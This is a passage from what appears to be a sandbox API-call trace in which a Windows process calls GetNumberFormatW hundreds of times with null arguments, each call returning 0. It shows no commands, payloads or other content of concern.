dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.906] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.907] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.908] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.908] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.908] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.908] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.908] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.908] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.908] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.908] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.908] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.908] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.908] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.908] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.908] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.908] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.908] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.908] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.908] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.908] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.908] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.908] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.908] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.908] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.908] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.908] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.908] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.908] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.908] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.908] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.908] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.908] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.908] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.908] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.908] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.908] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.908] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.908] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.908] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.908] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW 